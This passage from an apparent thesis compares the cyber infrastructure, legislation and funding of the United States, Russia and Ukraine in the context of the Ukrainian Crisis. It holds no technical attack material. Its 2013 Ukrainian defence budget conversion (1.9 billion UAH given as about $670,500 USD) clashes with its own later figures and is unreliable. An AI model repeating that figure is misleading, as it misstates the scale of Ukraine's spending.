The Soviet Union used similar tactics throughout the Cold War, such as funding pro-Communist groups and political parties in Western countries, using media to promote causes that furthered a Soviet goal, and aiming to have some control over Western media.44 While the fall of the Soviet Union and greater integration with the West allowed much of the control the USSR sought to dissipate, the current Putin administration has revived the idea. Russia now has a larger reach into media and Western states than the Soviet Union did. This reach is coupled with better technology and the ability to compete on the international stage, advocating for more than just survival.

A definition of hybrid war was offered, prior to the term’s widespread use, by two People’s Liberation Army officers in China. The book Unrestricted Warfare was written as a guide for militarily inferior states in a highly technological war against a larger adversary. The two authors predict “that non-war actors may be the new factors constituting future warfare…warfare which transcends all boundaries and limits.”45 Within this definition there is little that could not fall under hybrid warfare, because it can include any acts to subvert, spy, dissuade and so on. However, Unrestricted Warfare, which has many parallels to hybrid warfare, includes any type of warfare: traditional, hybrid and strictly technological. Thus, Unrestricted Warfare and hybrid warfare cannot be said to be the same thing.

43 Historical texts such as Mao Zedong, On Guerrilla Warfare (Washington D.C.: Department of the Navy, 1989), and Flavius V. Renatus, “De Re Militari,” ed. John Clarke, Digital Attic, accessed October 4, 2017, www.digitalattic.org/home/war/vegetius/, give two examples of how hybrid warfare was used previously, prior to the technological boom of today. These manuals focus on multiple tactics and different methods to be used in tandem when fighting to ensure a victory on multiple levels of the PMESII spectrum.
44 Christopher S. Chivvis, “Understanding Russian ‘Hybrid’ Warfare and What Can Be Done About It,” RAND Corporation, US House of Representatives (March 22, 2017). 7.
45 Qiao Liang and Wang Xiangsui, Unrestricted Warfare (Beijing: PLA Literature and Arts Publishing House, February 1999). 2.

With definitions housed in domestic legislation and lacking throughout international legislation, each definition can be warped to fit state needs. It is through legislation and semantics that states allow themselves to partake in cyberattacks, and it is through legislation and semantics that states protect themselves from the repercussions of carrying out a cyberattack. The definitions used in this thesis are more similar to descriptive adaptations of legislation from around the globe. These definitions and distinctions are unlikely to be agreed upon by any state in the international community or to be generally adopted.


3 DISTRIBUTION OF CYBER POWER

Disproportionate cyber capabilities between large and small states are the hallmark of what makes cyber a contentious new domain. The cyber domain is dynamic and changes rapidly, requiring states to develop and improve technologies and tactics constantly to remain in a position of power. Any state that has impending problems in cyber, such as lack of funding, lack of human capital, lack of resources and/or lack of training among the population, is unable to defend itself through active cyber defense and must rely on fortifying its systems in the event of an attack. With such radical and dynamic changes, only states that can fund research and development in those areas will be able to vie for dominance and increase their ability to protect themselves from threats.

The United States holds a dominant power position: it has systems to advance technology, a strong leadership role in international regulations and legislation, and the ability to fund many groups to create faster, more reliable systems. The United States is often seen as the pinnacle of modern technological advancement, with a firm grasp on international power. It is no different in the cyber domain. Russia has infrastructure to advance technologies and to develop highly trained personnel, the ability to manipulate international legislation in its favor, and the funding to allow such advances. Conversely, Ukraine lacks non-Soviet infrastructure for technological advancement; was, at the beginning of the Maidan Revolution, lacking a functional military, police service and government; is not privy to the same international organizations as the United States and Russia and therefore has little say in international legislation on cyber; and lacks the funding to bolster such programs to the degree needed.

By understanding the capabilities of different states, it is easier to understand why Ukraine remains at such a significant disadvantage in the Ukrainian Crisis. It seems obvious that there must be a change in how smaller states protect themselves from larger adversaries. While states such as the United States and Russia can defend themselves through active cyber defense and have readily available response teams for such events, small states such as Ukraine lack the infrastructure, the legislation and the funding to implement such programs, let alone the ability to gain the upper hand in the cyber domain.

This section of the thesis will expound upon what infrastructure, influence and financial support the United States, Russia and Ukraine can use to their advantage. The stark contrast between the capabilities of the United States, seen as the leader in cyber capabilities, and Ukraine is used to highlight the significant underdevelopment of Ukrainian cyber capabilities and the lack of technological advancement. A comparison between the United States and Russia is used to explain how Russia leads the international challenge to United States power over cyber, and how that could impact smaller states that rely on the dominance of the U.S. The comparison between Russia and Ukraine is used to highlight the significant gaps between the two countries’ infrastructure, legislation and funding for cyber capabilities, as well as to highlight the reliance of Ukraine on foreign aid when compared to Russia.

3.1 Infrastructure

Infrastructure is a key factor in who can exercise power over the networks. Infrastructure is the first of the three power structures because of its interplay with the other power structures. The states with stronger technological infrastructure can lead the way in advancement and implementation. States that hold more infrastructure in the public or private sectors are able to hold more power to influence subsequent legislation. The states that can remain ahead in technology are less likely to be crippled at a state level than a state that does not have the infrastructure to defend or fight back. For infrastructure to remain current and advancements to happen rapidly, each state must allocate enough funding to cyber capabilities. Power can be built on the presence of infrastructure; therefore, usable infrastructure must exist for power to manifest.

United States Power.

The majority of Internet system providers, such as Cisco and Microsoft, are U.S. companies. Most of the largest Internet-based applications used worldwide, such as Google, Facebook and YouTube, are headquartered in the United States. The United States government relies on infrastructure provided by the private sector, so it has a vested interest in helping protect it.46

The production of technology assets also influences who holds hegemony within cyber. Many parts of technological systems, such as computer chips or motherboards, are produced outside of the United States. To continue U.S. hegemony over the cyber domain, a balance of friendly cooperation and trade must ensure the continuance of technological services within the United States. By producing parts of technology overseas, the American service industry can continue to provide protection, consulting and training, among other services. This would continue to protect the U.S. economy and protect the very systems that allow the cooperation. However, this binds the United States to specific actions regarding trade in the technological sector and to a balance between cooperation and willingly giving protected information to adversarial states. This balance has become a problem in the past, such as when cooperation between Microsoft and China ended with Chinese computer scientists using the source code, provided under the guise of friendly cooperation, to develop malicious code, viruses and backdoors that could be exploited in future situations.47 This cooperation resulted in the hacking of the United States Pacific Command Headquarters, causing serious ramifications for the U.S. military and its networks.48 Losing American intellectual property has a ripple effect within the U.S., as “military strength ultimately depends on economic vitality.”49

46 William J. Lynn III, “Defending a New Domain: The Pentagon’s Cyberstrategy,” Foreign Affairs 89, 5 (2010): 100.
47 Panayotis A. Yannakogeorgos, “Internet Governance and National Security,” Strategic Studies Quarterly 6, 3 (2012): 108-109.

However, much of the United States’ electronic information is housed on computers that are exposed to the same vulnerabilities as computers owned by ordinary civilians. Since the government uses applications such as Internet Explorer or Word, its computers are often vulnerable to the same attacks as civilian computers. While some computers operate on the Secure Internet Protocol Router network (SIPR) and have additional security through connections to different security domains, computers that house unclassified or sensitive but unclassified information operate on the same networks as civilian data through the Non-Classified Internet Protocol Router network (NIPR). These computers are vulnerable to direct attacks as well as to attacks from other networks, because officials can check personal email, log into Facebook and browse other websites that host malware. The computers that run on classified domains are often placed behind different security protocols, such as ID scanners with personal PINs, and devices are locked with password protection. However, this is not always the case, and some classified-domain computers are in unsecured areas, creating vulnerabilities in the physical protection of classified information.

These vulnerabilities, especially the use of zero-day exploits, motivate the United States to be careful about the flow of information and the protection afforded to its classified information.

Paradoxically, the states with the most technological infrastructure and the strongest security protecting that infrastructure are the most attacked.50 The most common targets are often the states that boast the most sophisticated cybersecurity systems and rely the most heavily on cyber assets to ensure the continued management of the state, due to the high reward of a successful attack. In 2018 the United States was the most targeted state for cyberattacks, including both cybercrime and cyber espionage attacks.51 Despite these continuous attacks, their impact is minimized by consistent investment of funds and resources in cybersecurity infrastructure. U.S. military spending exceeds that of other states around the world and, while cyber is only a small part of the budget, it is significant when compared with other states’ cybersecurity programs. The United States government also pays for cyber response teams that are integrated into higher education institutions so research and development can proceed quickly. Analysts and cyber specialists are present at all government levels, at companies, and throughout police departments.

48 Yannakogeorgos, “Internet Governance and National Security,” 109.
49 Lynn, “Defending a New Domain,” 100.
50 International Telecommunication Union (ITU), “Global Cybersecurity Index 2017,” ITU, 6 July 2017.

Russian Power.

Russia has emerged as a major player on the international cyber stage. Russia has a unique advantage when it comes to cyber assets’ infrastructure, due to the wide expanse of the former Soviet Union and the remaining Soviet infrastructure still in use in most post-Soviet states. Many of Russia’s adversaries are located in close geographic proximity and were Soviet Socialist Republics, so the majority of infrastructure in these states is closely tied to Russia’s infrastructure.

Communications companies are usually subsidiaries of a Russian parent company, systems for the electrical grids are based on a Soviet model, and a large amount of military infrastructure is a remnant of the former Soviet Union. These states, following the fall of the Soviet Union, were largely in poverty and focused on utilizing the existing infrastructure rather than rebuilding from the ground up. Such was the case in the Georgian cyberattacks, where DDoS attacks were used to disrupt communications between Georgian military forces.52 This tactic was also used in the Ukrainian Crisis, and this was achieved relatively easily due to the Russian superiority over former Soviet states’ technological asset production and services. By creating a demand for Russian products, the Kremlin can exploit them or retrieve information stored on the devices without needing permission, due to the monopoly it holds over the systems. The Russian government continues to work with these companies to ensure this ongoing information exchange. Russian communications networks are so heavily relied on in post-Soviet states that even United States diplomats must use Russian-provided services for official communication.53

51 Control Risks, “Cyber Security Monthly,” 08 November 2018.
52 “Marching off to cyberwar,” The Economist, 6 May 2009. https://www.economist.com/technology-quarterly/2008/12/06/marching-off-to-cyberwar

Perhaps the most documented cyberattacks in recent history have been those perpetrated by the Russian government. The breadth of Russia’s capabilities, and its ability to use those capabilities on the international stage, have ensured that Russia cannot be ignored when cyber is being discussed. In 2007, Estonia’s networks were shut down by a Distributed Denial of Service (DDoS) attack.54 The attack was attributed to Russia as a retaliatory attack following the removal of a Soviet-era statue from a public square. While Russian use of cyberattack is generally looked at as an undemocratic use of network interconnectedness, the strategy has been successful throughout the past decade with little intervention in the attacks. By using the Internet to launch attacks, attacks reminiscent of soft power, Russia has shown itself to be a major player, unable to be ignored, and has therefore gained an advantageous position in the creation, or lack thereof, of international cyber standards and policy. While there has been international pressure from the West, Russia has been strategic in its actions, using cyber to influence other states rather than cause an international incident through cyber. The attacks Russia has used in the past all fall outside the scope of cyber warfare and most commonly fall within cyber espionage, which is less likely to elicit a retaliatory response.

53 This is known from the author’s personal experiences.
54 Damien McGuinness, “How a cyber attack transformed Estonia,” BBC, April 27, 2017. https://www.bbc.com/news/39655415

Ukrainian Power.

When Ukraine became independent from the Soviet Union in 1991, it was already at a disadvantage because advancements away from Soviet Union companies and technologies never happened, leaving its industrial and technological complex integrated with Russia and housed in Soviet infrastructure. Much of the telecommunications infrastructure was owned by Russian companies, and much of the information flowing into Ukraine was from Russian media sources and news outlets. Leading up to the Maidan Revolution there was little consideration of, or even possibility of, removing the deeply integrated Russian systems from the infrastructure within Ukrainian state borders. The already contentious relationship between ethnically Russian Ukrainians and ethnically Ukrainian Ukrainians limited the Ukrainian government’s ability to remove Russian-sourced media from the newly autonomous state due to fear of retribution. The infrastructure of Ukraine is largely vulnerable to attacks from Russia because it still uses old Soviet systems or was upgraded with new technologies sourced from Russia. Even as the war in Donbas has continued, there has been an inability to remove Russian technologies, communications companies with Russian parent companies, and Russian-sourced media from within the state. Any desire by the government to do so ignites protests in the predominantly Russian-speaking provinces and gives the Kremlin further propaganda material.

3.2 Legislation

Much like a large military can influence how states interact, dominance in the cyber domain influences behavior. Such actions have been undertaken recently by Russia. The Ukrainian Crisis and the strong divide between the ethnically Russian and ethnically Ukrainian populations are one example of how information warfare is an important part of state power. The influence of Russia on the United States 2016 presidential election has caused repercussions beyond the election result and still consumes the current White House administration, the media and the general public. Having power over influence in the cyber domain is not so different from having military power, because it can be used to manipulate a target state.

Domestic legislation is important for responding to cyberattacks, and the varying levels of legislation are indicative of the preparedness of a state. Cyberattacks have occurred for nearly as long as the Internet has been public, and a state that is focused on legislation is more likely to have had its defenses tested and to have a higher level of training and preparedness in place to deter, delay, prevent and de-escalate a cyberattack. Having a voice in international legislation is crucial to states’ use of cyberattacks and hybrid warfare.

Legislation has a large impact on how states use and control the Internet. Currently the largest governing body for the Internet is the Internet Corporation for Assigned Names and Numbers (ICANN), created under U.S. legislation and with U.S. oversight.55 With rapid technological advancement, the next Internet governance direction is likely to sway cyber power away from the United States towards the state in which it was created. Already, states such as China that maintain domestically created alternatives to popular platforms have an advantage in gaining a seat at the table for international discussions on protocols and standards within the cyber domain.

Any significant new technologies will give the state in which they are housed a larger role in how to manage the interconnectedness of the Internet as its influence grows. Already the United States is losing its hold on Internet hegemony, as an initiative led by Russia and China is pushing against U.S. dominance of ICANN Internet governance.56 Brazil, South Africa and India have all been vocal opponents of U.S. power over cyber, partnering with Russia and China to move Internet resources away from the U.S. and towards a multilateral body.57 Not only has Russia been able to monopolize communication services in post-Soviet states, Russia has also been able to use the lack of internationally agreed-upon definitions to its advantage. Since there is a lack of international legislation focused specifically on what constitutes valid Internet usage and on protections around cybercrime and cyberattack, the Kremlin is able to deploy cyberattacks that fall within the grey area of the international law and human rights agreements that have been used to regulate cyber.

55 Jonathan Weinberg, “ICANN and the Problem of Legitimacy,” Duke Law Journal 50, 1 (2000): 206.
56 Yannakogeorgos, “Internet Governance and National Security,” 115.

With the fight for hegemonic control of Internet standards each state is engaged in a standoff, actively trying to gain competitive advantage for their state while simultaneously engaging in collaborative discussions marred by low trust and high stakes.

Even if Russia has not emerged as the leader in Internet standards, the focus on creating a technologically educated population, as well as on dominating cyber technologies and communication structures, has allowed Russia a place among the elite few that can strongly challenge U.S. cyber hegemony.

In comparison, Ukraine has minimal to no say over network standards. First and foremost, small states rarely have a say in the outcomes of network standards and protocols. These aspects are largely controlled by the United States, with very few other states able to challenge its hegemony. Negotiating for better network access and more beneficial standards and protocols has not been a priority of the Ukrainian government, even with the advent of the Ukrainian Crisis. Marred by old technologies and corruption, Ukraine severely lacked, and continues to lack, a seat at the table to influence international network regulations.

57 Yannakogeorgos, “Internet Governance and National Security,” 117.

We now explore specific legislation in the United States, Russia, and Ukraine to understand the specific strengths and opportunities available to these three key players. The United States has the longest, most comprehensive domestic legislation for cyberattacks and technological advances.

Domestic legislation for the United States is largely focused on the protection of information and technology, and the advancement of infrastructure surrounding the protection of United States networks. Comparatively, Russian legislation is mainly housed within military doctrine and is focused on simplifying cyberattacks and hybrid warfare to allow for broad generalizations and personal interpretations of the law. Compared to the United States, Russian legislation is heavily focused on offense. Internationally, Russia is fighting the United States for hegemony over legislation to ensure its offensive posture can be continued. When comparing Ukraine with both the United States and Russia, the amount of domestic legislation, the international influence exerted, and the ability of Ukraine to combat cyberattacks with offensives of its own are dwarfed in comparison. Ukraine is at a vast disadvantage against its adversaries, and data-driven cyber prediction can be incredibly beneficial to the defensive plight of such a disadvantaged state.

United States Legislation.

Not only is the United States fighting for international hegemony, it also has to apply pressure to the domestic laws and regulations of other states so that those policies align with its interests, because of “the interconnected nature of the internet…domestic policy, the actions of domestic firms and non-state actors can have significant negative externalities.”58 Since cyber is rapidly changing and effects within the cybered sphere are nearly instantaneous, domestic cyber legislation is an important consideration when looking at the disproportionate power of large states compared to small states. States such as the United States have a distinct advantage due to a long history with the Internet and interconnected technologies.

58 Mark Raymond, “Engaging Security and Intelligence Practitioners in the Emerging Cyber Regime Complex,” The Cyber Defense Review 1, no. 2 (2016): 82.

Early on in its creation, the Internet was centered around U.S. military communication. Therefore, the technology and its subsequent growth was largely housed within the United States and led to the creation of U.S. domestic legislation on computers and cybersecurity prior to its creation in other states.

In 1981 the Department of Defense Computer Security Center was founded as a subsidiary of the NSA, becoming the National Computer Security Center (NCSC) in 1985. This Center worked with agency partners to “promote research and standardization efforts for secure information about issues surrounding secure computing,”59 and to “encourage the widespread availability of trusted computer systems for use by those who process classified or other sensitive information.”60 Further, the NCSC worked with the Trusted Product Evaluation Program (TPEP), which tests “security features of commercially produced and supported computer systems,” and “evaluates the protection capabilities against the established criteria presented in the Department of Defense Trusted Computer System Evaluation Criteria.”61 The Department of Defense Trusted Computer System Evaluation Criteria aim “to address computer security issues…under the leadership of the National Bureau of Standards (NBS)” as well as to “provide DoD components with a metric with which to evaluate the degree of trust that can be placed in computer systems for the secure processing of classified and other sensitive information,” and to “provide a basis for specifying security requirements.”62 These criteria and centers address the need for securing computers and were created for commercial manufacturers as well as for government systems.

59 Margaret Rouse, “National Computer Security Center (NCSC),” SearchSecurity, April 2010. https://searchsecurity.techtarget.com/definition/National-Computer-Security-Center
60 Department of Defense Trusted Computer System Evaluation Criteria (DoD 5200.28-STD), 7.
61 National Computer Security Agency, Trusted Product Evaluation: A Guide for Vendors (Washington D.C.: GPO, 1990): i.

In 1986, Public Law 99-474, known as the Computer Fraud and Abuse Act, was passed to provide protection against “the use of the computer to intentionally access a Federal interest computer without authorization” and “[whoever] knowingly and with intent to defraud, access a Federal interest computer without authorization, or exceeds authorized access, and by means of such conduct further the intended fraud.”63 This act was the first federal legislation to specifically address computer security. This put the United States in the unique position of having some of the first legislation on cybersecurity, and it coincided with the beginning of the state’s prevalence in the international community.

In 1988 the first computer worm, the Morris worm, wreaked havoc on U.S. computer networks, which led to the creation of the Computer Emergency Response Team (CERT) at Carnegie Mellon, thereby establishing a “partner with government, industry, law enforcement, and academia to advance cybersecurity and improve the security and resilience of computer systems and networks.”64 Following the Morris worm, the government passed the 1996 Health Insurance Portability and Accountability Act (HIPAA), regulating health privacy, and the 1999 Gramm-Leach-Bliley Act (GLBA), regulating security in the financial sector. The United States was working to protect critical infrastructure at the federal level through those acts and continued to protect the main areas of socio-economic vulnerability by passing Public Law 107-296 following the attacks on 9/11, focused on the protection of infrastructural information and the specifications for sharing such information over unsecured channels.65 Public Law 107-296, also known as the Homeland Security Act, housed the first Federal Information and Security Modernization Act, known as the Cyber Security Enhancement Act of 2002.66 The Department of Homeland Security (DHS) absorbed the majority of organizations aimed at protecting United States cyberspace and its hegemony in cyberspace.67 In 2003 the Federal Computer Incident Response Center (FedCIRC) was moved under DHS authority and renamed US-CERT, similar to the institution Carnegie Mellon had created in 1988 following the Morris worm. These federal institutions operated to identify cybersecurity vulnerabilities and to thwart new threats before, or as soon as, they appeared, while simultaneously working to upgrade the network technology in use.

62 Department of Defense Trusted Computer System Evaluation Criteria (DoD 5200.28-STD): 7-8.
63 99th Congress. H.R. 4718: Computer Fraud and Abuse Act of 1986. United States Congress: GPO, 1986. https://www.govtrack.us/congress/bills/99/hr4718/text/enr. Section 2, Subsection D, Article 5.
64 Carnegie Mellon University. “Software Engineering Institute: History,” last updated 2018. https://www.sei.cmu.edu/about/divisions/cert/index.cfm#history

Russian Legislation.

Russian domestic cyber policy is perhaps the most internationally influential domestic policy within this realm of security. Domestic policies inform the majority of Russia’s cyber activities, even on an international scale, and are sufficiently vague to allow for a broad interpretation of how cyber can be used against adversaries. In 2007, the Russian Ministry of Defense approached the United Nations with concerns over information campaigns, positing that “an information campaign directed by one country against another could under some circumstances be classified as aggression and therefore was illegal under the UN Charter.”68 However, because the United States largely held a monopoly on influence in cyberspace at this point, the United States delegation created an information security resolution in 2008 that declared “existing international law could theoretically be applied to cyber conflict.”69 Following this, the Russian Federation changed its strategy towards cyberspace and outlined in its 2010 Military Doctrine a shift towards the coordination and execution of information warfare, aimed at updating the force into a modern, highly mobilized fighting force.70 This change in military doctrine effectively makes all Russian interference a military decision. Russian interference over open platforms, such as Twitter and Facebook, while not illegal, and only loosely included in our definition of information warfare, would also be considered a military decision based on the 2010 Doctrine. By using military doctrine, Russia is closely integrating its cyberspace and military capabilities, which is likely to give it an advantage throughout the domain.

65 “Public Law 107-296: To Establish the Department of Homeland Security, and for other purposes.”
66 107th Congress. “Public Law 107-296: To Establish the Department of Homeland Security, and for other purposes.” 25 November 2002. https://www.dhs.gov/sites/default/files/publications/hr_5005_enr.pdf
67 US-CERT. “About Us.” Last updated 30 September 2016. https://www.us-cert.gov/about-us
68 Tom Gjelten, “Shadow Wars: Debating Cyber ‘Disarmament’,” World Affairs 173, no. 4 (2010): 36.

Another disparity between approaches rests on key definitions and, specifically, the inability of states to agree on internationally acceptable definitions. With the lack of an international consensus on cyber definitions, states are able to determine their own definitions that work most effectively to advance their own state goals. For instance, “Russian military theorists do not generally use the terms cyber or cyber warfare. Instead they conceptualize cyber operations within the broader framework of information warfare.”71 The Russian approach to definitions of components within cyberspace is just one of the many state approaches that make it difficult to create specific international legislation surrounding these issues after the state legislation has already been established.

69 Gjelten, “Shadow Wars,” 40.
70 Azhar Unwala and Shaheen Ghori, “Brandishing the Cybered Bear: Information War and the Russia-Ukraine Conflict,” Journal of the Military Cyber Professionals Association 1, no. 1 (2015): 1-11, 2.
71 Connell and Vogler, “Russia’s Approach to Cyber Warfare.”

Ukrainian Legislation.

In contrast to these powerful states, Ukraine has lagged in cyber legislation and cyber defenses. Leading up to the Ukrainian Crisis there was little, if any, consideration of cyber security in Ukraine. The Criminal Code of Independent Ukraine in 2001 did add considerations of cybercrime in Article 163 on the “violations of mail, telephone communications, telegraph and other correspondence…via computers” and Chapter 16, “Criminal offenses against computers, computer systems and networks.”72 In Ukrainian legislation until 2013, the term cyber was rarely used. It was mentioned for the first time in the Law of Ukraine “On Fundamentals of National Security of Ukraine,” introduced in 2003, as a single bullet point of Article 7, “Threats to National Interests and Security.”73 In other legislation, the term cyber is not used, but computers and attacks against computers are mentioned, although in limited terms. In the Laws of Ukraine “On Legal Regime of a State of Emergency” (2000) and “On the Legal Regime of Martial Law” (2000), computers and computer networks are mentioned as a place to seek protection and to enforce rule of law.74 The Law of Ukraine “On Intelligence Services” (2011) deals with computers and information obtained by legitimate law enforcement officials, but not with privacy on a grand scale.75 The Law of Ukraine “On the Fight Against Terrorism” (2011) mentions computers and technological terrorism as a part of the definition of terrorism, but offers no distinct path through which to respond to, or be proactive against, technological terrorism.76 Further, the Ukrainian government has laws in place regarding confidential communication, but these laws are vague on definitions and implementation across a wide variety of mediums.77

72 “Criminal Code of Ukraine.” Verkhovna Rada: September 1, 2001. https://www.imolin.org/doc/amlid/Ukraine_Criminal%20Code%202001.pdf
73 “On Fundamentals of National Security of Ukraine,” No. 964-IV with changes introduced by Laws N 3200-IV of 15.12.2005, N 3411-VI of 01.07.2010. Accessed via https://www.dcaf.ch/sites/default/files/publications/documents/Book_LAW-engl_PRESS.pdf
74 “On the Legal Regime of Martial Law,” 1647-III including changes made by No. 662-IV of 03.04.2003, BVR, 2003, No 27, p. 209; No. 803-VI of 25.12.2008, BVR, 2009, No 19, p. 258; No. 1836-VI of 21.01.2010, BVR, 2010, No 12, p. 119; No. 2592-VI of 07.10.2010, BVR, 2011, No 10, p. 63. Accessed via https://www.dcaf.ch/sites/default/files/publications/documents/Book_LAW-engl_PRESS.pdf
75 Ibid. 245.
76 “On the Legal Regime of Martial Law,” 1647-III including changes made by No. 662-IV of 03.04.2003, BVR, 2003, No 27, p. 209; No. 803-VI of 25.12.2008, BVR, 2009, No 19, p. 258; No. 1836-VI of 21.01.2010, BVR, 2010, No 12, p. 119; No. 2592-VI of 07.10.2010, BVR, 2011, No 10, p. 63. Accessed via https://www.dcaf.ch/sites/default/files/publications/documents/Book_LAW-engl_PRESS.pdf. 260.

Following the Maidan Revolution and the Annexation of Crimea, the Ukrainian government aimed to take a more comprehensive look at cybersecurity. The National Security Strategy of Ukraine was adopted on May 26, 2015, and aimed to “minimize threats to state sovereignty, and create conditions for restoration of territorial integrity of Ukraine…and secure a European future.”78 The Strategy mentions cyberattacks as an “acute threat” within the larger category of information threats.79 The Information security policy (4.12) states that “setting up a cybersecurity system including coordination of efforts in countering cyberterrorism, protection against cyberattacks on critical infrastructure, predominately in the military, energy, transportation, telecommunications and banking spheres” is a priority.80 This policy further states Ukraine’s adherence to international practice of cybersecurity and intentions to work towards implementing policies under NATO and the EU.81 This document was created prior to the largest infrastructural attacks, but had no specific cyber defense measures put into place leading up to BlackEnergy3/KillDisk, the first major attack against the Ukrainian industrial complex.

Legislation within Ukraine was largely absent surrounding cybersecurity until it had to be implemented during wartime. It was not until after the BlackEnergy3/KillDisk attack against critical infrastructure that the Ukrainian government adopted a National Cyber Security Policy, by presidential decree in February 2016.82 The strategy outlined the main areas of focus to ensure cybersecurity in Ukraine and is based on the Convention on Cyber Crime, ratified by Ukraine on 7 September 2005, and on the legislation of Ukraine on national security, domestic and foreign policy, electronic communications, and protection of state information resources.83 The Strategy names the “ongoing aggression of the Russian Federation, and other fundamental changes in the external and internal security environment of Ukraine” as requiring “the immediate establishment of a National Cyber Security System as an integral part of the National security of Ukraine.”84 The main areas of the strategy are “developing a safe, sustainable and reliable cyberspace,” revamping “cybersecurity of the government electronic information resources,” improving and developing critical infrastructure cybersecurity, “developing cybersecurity capabilities in the defense sector” and training to fight cybercrimes.85 This strategy includes not only a means to combat cyberattacks perpetrated for political and national security interests, but also cybercrimes perpetrated by third parties, not backed by political or security motives and not operating for a foreign power, and it differentiates between ‘Cyberthreats of military nature,’ ‘Cyber espionage,’ ‘Cyber terrorism’ and ‘Cybercrime.’ This strategy, although implemented in 2016, is part of the steps to implement Ukraine’s National Security Strategy.86

77 “On the National System of Confidential Communication,” 2919-III of 10.01.2002 including changes made by No. 1280-IV of 18.11.2003, BVR, 2004, No. 12, p. 155; No 2599-IV of 31.05.2005, BVR, 2005, N 26, p. 349; No 879-VI of 15.01.2009, BVR, 2009, N 24, p. 296. Kyiv, Ukraine: 2002. Accessed via https://www.dcaf.ch/sites/default/files/publications/documents/Book_LAW-engl_PRESS.pdf
78 National Defence and Security Council, “National Security Strategy of Ukraine,” http://www.niss.gov.ua/public/File/2015_analit/strategiya_2015.pdf
79 Ibid. 6.
80 Ibid. 23.
81 Ibid.

In June 2016 the National Cybersecurity Coordination Center was created under the National Cybersecurity Strategy as part of the National Security and Defense Council.87 This center has “a supervising function and undertakes tasks related to analyzing the state of national cybersecurity and its preparedness for combating cyber threats as well as forecasting and detecting relevant potential and actual threats.”88 This body deals with both insider and outsider threats, and aims to limit cybercrime as well as cyberattacks. The Center has “taken lead on enforcing a rapid response protocol together with other actors that allow stopping further spread of the malware.”89 This body coordinates with other branches of law enforcement, including the Cyber Police, as well as foreign governments that have assisted Ukraine in responding to cyberattacks.

82 Presidential Decree of Ukraine. “Cyber Security Strategy of Ukraine,” No. 96/2016. 15 March 2016.
83 Ibid.
84 Ibid.
85 StratComUA. “Cybersecurity Strategy of Ukraine.”
86 Presidential Decree of Ukraine No. 287, 26 May 2015.
87 UNIAN. “Ukraine Creates National Center for Cybersecurity,” June 8, 2016. https://www.unian.info/society/1369157-ukraine-creates-national-center-for-cyber-security.html

The cybersecurity strategy of Ukraine, however, does not address the problem of attackers accessing smaller companies to carry out an attack against larger targets, and the protections that had been put in place since the 2015 and 2016 attacks were breached. Further, there were similarities in the code of the BE3/KillDisk, CrashOverride/Industroyer and NotPetya attacks, calling into question the effectiveness of the implementation of the Ukrainian cybersecurity strategy. Ukraine is continuing its movement forward on important cyber defense projects, but the success of the Ukrainian cybersecurity program largely hinges on Western states’ expertise and assistance. Historically, it has been the United States that has helped in the aftermath of cyberattacks, with technical expertise and the export of services, after both BlackEnergy3/KillDisk and CrashOverride/Industroyer. The United States continues to assist Ukraine in its cybersecurity endeavors, as is evidenced by H.R. 1997, the Ukraine Cybersecurity Cooperation Act of 2017, which passed the House of Representatives on 8 February 2018. This bill seeks to reaffirm cybersecurity cooperation and the Charter on Strategic Partnership between the United States and Ukraine, as well as to assist in maintaining an open internet and reducing Ukrainian reliance on Russian telecommunications systems and infrastructure.90

88 Global Forum on Cyber Expertise, “Cybersecurity in Ukraine: National Strategy and International Cooperation,” June 7, 2017. https://www.thegfce.com/news/news/2017/05/31/cybersecurity-in-ukraine
89 Leo Streltsov, “The System of Cybersecurity in Ukraine: Principles, Actors, Challenges, Accomplishments,” Eur J Secur Res 2 (2017): 159.

3.3 Funding

Ukraine is at a significant disadvantage due to a lack of funding for cyber in addition to a shortage of other military technology. States able to provide more funding to their cybersecurity programs are going to be able to provide a higher quality of cyber defense for the state. The following considers the relative differences between the United States, Russia, and Ukraine with respect to funding.

United States Funding.

The United States Federal budget for fiscal year (FY) 2019 includes $15 Billion USD for cybersecurity related activities. Additional funding is also allocated, but a number is not provided due to the sensitive nature of the activities.91 Seventy-six United States civilian agencies, including the DoD, have a budget for cybersecurity in FY 2019 under the federal budget.92 Those numbers, which do not include specific agency spending regarding their own network security, reflect the funding aimed at creating programs and initiatives that serve a “broader cybersecurity mission”.93

The United States has a task force and multiple departments tasked with protecting information and technology within the cyber domain. Many international corporations boast large teams of information engineers and cybersecurity experts with the sole purpose of protecting the company’s proprietary information.

90 H.R. 1997. “Ukraine Cybersecurity Cooperation Act of 2017,” Senate of the United States, February 8, 2018.
91 Section 630 of the Consolidated Appropriations Act, 2017 (Pub. L. No. 115-31) amended 31 U.S.C. § 1105(a)(35). 273. https://www.whitehouse.gov/wp-content/uploads/2018/02/ap_21_cyber_security-fy2019.pdf
92 Ibid.
93 Section 630 of the Consolidated Appropriations Act, 2017. 273.

Russian Funding.

Russia is the third largest military spender, following the United States and China, spending 4.88 trillion rubles (73.47 billion USD at today’s conversion) in 2018 on defense and security, a 17 percent increase over the previous 5 years.94 This number is most likely not a complete accounting of total expenditure for the Russian military-industrial complex, since military expenditure is also housed within the expenditure of different organizations and not reported as national defense.95 A 2018 report attempted to compile Russian spending on cybersecurity and determined that Russia spends approximately $300M USD and has around 1,000 cybersecurity specialists that act as offensive troops.96

Ukrainian Funding.

In stark contrast, the Ukrainian military budget in the year 2013, the beginning of the Maidan Revolution, totaled 1.9 billion Hryvnia (UAH), the equivalent of approximately $878,700 CAD or $670,500 USD. This budget included all aspects of the military complex.97 While no specific numbers are available on the exact amount spent on cybersecurity specifically, the entire budget for the defense of Ukraine was less than the lowest amount given to any one of the United States civilian agencies in the FY2019 budget for cybersecurity alone. The defense budget grew following the annexation of Crimea and the subsequent war in Donbas to 64.247 billion UAH in 2017 ($3B CAD or $2.3B USD).98 While these numbers are not specific to the cybersecurity industrial complex, they show the growth that Ukrainian military infrastructure underwent following the aggression in eastern Ukraine. Further, Ukraine receives large amounts of funding to supplement the cost of heightening or instituting cybersecurity programs and strengthening training for cybersecurity professionals. Western states such as the United States and Canada, as well as international organizations like the EU and NATO, are involved in supporting Ukraine and supplying technical expertise or easing the burden of the monetary costs of new technologies.

94 “Бюджет России на 2018 год: чем будут наполнять и на что тратить,” Деловая жизнь bs-life.ru. http://bs-life.ru/makroekonomika/budzet2018.html
95 Vladimir Jushkin, “What is Hidden in Russia’s Military Budget?” Stockholm International Peace Research Institute, 25 May 2018. https://icds.ee/what-is-hidden-in-russias-military-budget/
96 “Russia among top 5 countries with highest cyber security budget,” Sputnik News, 1 October 2017. https://sptnkne.ws/dm32
